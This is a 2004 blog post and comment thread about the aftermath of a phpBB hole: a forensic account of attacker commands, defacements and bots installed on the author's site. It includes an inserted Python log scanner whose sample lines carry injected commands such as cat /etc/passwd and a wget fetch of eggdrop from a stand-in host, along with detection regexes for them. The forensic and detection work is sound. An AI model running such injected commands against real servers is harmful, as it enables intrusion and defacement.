
November 30, 2004

Whee fun

by fluffy at 9:27 PM
Now that I know about (and have fixed) that little teeny tiny hole in phpBB, I've gone back and looked at the logs... it looks more like there have been a fuckton of people abusing trikuare.cx in that way, going all the way back to November 18 when the exploit was first announced. Whee. Lots of it is going through open proxies which appear to have been installed on other systems, too.

Most of it was fairly innocuous (like, cat /etc/passwd which does absolutely fuck-all on a system which uses shadow passwords), but there's lots and lots of other stuff too.

Honestly, I'm surprised that my site wasn't totally decimated or anything (and that nothing truly evil was installed before the 26th), and that there weren't a bunch of rootkits installed and so on. It also looks like it was all going through the same stupid wrapper script, and it was all done by a bunch of stupid kids who just wanted to prove that they, too, were 1337 h4x0rs or whatever. Yeah, like running other peoples' scripts after doing a websearch on "phpBB 2.0.10" is so hard, and shows off j00r m4d sk1llz. Awesome, dudes.

Anyway, doing some forensics on the logs that I still have (meaning, up to when they installed the new httpd) finds a lot of boring stuff:

  • lots of ls -l, cat /etc/passwd, and other stupid stuff which wouldn't really do anything useful
  • lots of testing what stuff is installed (by running wget, uname, etc.)
  • lots of website defacements which failed, because they all tried writing index.htm when my site uses index.html for everything
  • a couple of website defacements which should have succeeded, so it could be that my site's index page simply read "esses hackers de hj em dia apenas o un-root para fazer diferenca" for a few days without anyone noticing or bringing it to my attention
  • attempts at defacing other sites hosted on this host (of course, this all runs under suexec and my account has no access to writing in it)
  • things which show that they actually did do a fairly good job of probing for where things are kept, like my docroot and the global host docroot and so on (though I don't know if the global docroot is in the standard Gentoo location or something)
  • the successful installation (and probably successful execution) of various eggdrop bots (which weren't running yesterday, but that's probably because the webhost had been rebooted due to mysterious circumstances a few days prior, possibly in turn due to this crap)
  • lots and lots and lots of calls to w (nothing like some healthy paranoia, which turned out to be unnecessary since neither myself nor the admin are good at checking the process list, heh)
  • the installation of lots of scary stuff, like daemons which allowed people to remotely login (probably without a password), portsentry, possible rootkits (which were used to do who knows what before the admin upgraded the kernel to the latest version, which happened to fix that mmap() security hole which lots of things have exploited lately)
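A small scanner for the kind of log review described above, added here as an example and not anything from the post or from phpBB: the log lines are constructed, and the `page.php?q=` request is a placeholder for the injection point, not the real vector. It URL-decodes each request and tallies the command patterns the list above mentions, plus the distinct source addresses (which is where the open proxies show up).

```python
"""Scan Apache access logs for the command-injection traffic the post
describes. Added example, not the site's own tooling. Log lines are
constructed and the request path/parameter is a placeholder, not the
real phpBB vector."""
import re
from collections import Counter
from urllib.parse import unquote_plus

SEP = r"(?:^|[;|&=\s])"   # a shell/query separator must precede a command
# Categories taken from the post's list of findings.
INDICATORS = {
    "recon": re.compile(SEP + r"(?:ls -l|cat /etc/passwd|uname|w)(?=$|[;|&\s])"),
    "toolcheck": re.compile(SEP + r"wget(?=\s)"),
    "deface": re.compile(r">\s*\S*index\.html?\b"),   # .htm writes failed; .html would not
    "bot": re.compile(r"eggdrop"),
}
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

SAMPLE_LOG = [  # constructed sample, not real traffic
    '203.0.113.7 - - [19/Nov/2004:03:12:45 -0800] "GET /forum/page.php?q=cat%20/etc/passwd HTTP/1.1" 200 512 "-" "Mozilla"',
    '203.0.113.7 - - [19/Nov/2004:03:12:50 -0800] "GET /forum/page.php?q=uname%20-a;w HTTP/1.1" 200 80 "-" "Mozilla"',
    '198.51.100.9 - - [20/Nov/2004:11:02:01 -0800] "GET /forum/page.php?q=wget%20http://example.invalid/eggdrop.tgz HTTP/1.1" 200 0 "-" "Mozilla"',
    '198.51.100.9 - - [20/Nov/2004:11:02:30 -0800] "GET /forum/page.php?q=echo%20owned%3Eindex.htm HTTP/1.1" 200 0 "-" "Mozilla"',
    '192.0.2.44 - - [21/Nov/2004:09:00:00 -0800] "GET /forum/page.php?t=12 HTTP/1.1" 200 8192 "-" "Mozilla"',
    "not a log line at all",
]

def classify(line):
    """Return (client_ip, [matched categories]) or None if the line won't parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, path, _status = m.groups()
    decoded = unquote_plus(path)   # payloads arrive URL-encoded; match the decoded form
    return ip, [name for name, rx in INDICATORS.items() if rx.search(decoded)]

def summarize(lines):
    """Hit count per category plus the distinct source IPs (open proxies show up here)."""
    cats, ips = Counter(), set()
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            ips.add(parsed[0])
            cats.update(parsed[1])
    return dict(cats), sorted(ips)

if __name__ == "__main__":
    counts, sources = summarize(SAMPLE_LOG)
    print(counts, sources)
```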
Just think, if one of these kids who are so well-organized and hell-bent on finding every little security hole on the Internet had a conscience and actually told site admins that their site was susceptible to a hacking, none of that would have happened.

Meh. People suck.

Comments

#3991 11/30/2004 07:34 pm
Does your host have any sec tools or IDS installed, like chkrootkit, snort, etc? I don't know if these things help at all...
#3993 11/30/2004 07:45 pm
It does now.

(Yes, I know it's a bit like squeezing your buttocks after you have already farted, to quote the Japanese proverb.)
#3998 Anonymous 12/01/2004 01:57 pm
i wrote my own comment script for my site...
unfortunately, if i want an upgrade, i have to do it myself.
fortunately, nobody else knows how the damn thing works.
it's a tradeoff :)
you know, it's kinda weird to come to this post screen and have it look completely different from the reading screen.
-bill (heuristics inc.)
#4000 12/01/2004 02:47 pm
If you haven't found it already, there is an okay snort log analyzer tool at http://jeremy.chartier.free.fr/snortalog/.
#4001 12/01/2004 03:22 pm
bill
i wrote my own comment script for my site...
unfortunately, if i want an upgrade, i have to do it myself.
fortunately, nobody else knows how the damn thing works.
it's a tradeoff :)

Security through obscurity isn't all that good. Personally I try to keep all of my scripts secure so that I don't have people hammering on them trying to find ick for common issues with scripts. I even keep the source in plain view with the hopes that others will audit it in a happy way.

bill

you know, it's kinda weird to come to this post screen and have it look completely different from the reading screen.
-bill (heuristics inc.)
Someday I will get around to making my own phpBB template. It's more likely that I'll sooner just write a custom forum engine which just drops in anywhere PHP goes, though. (I have lots of ideas on how to do this, and of course only finite time.)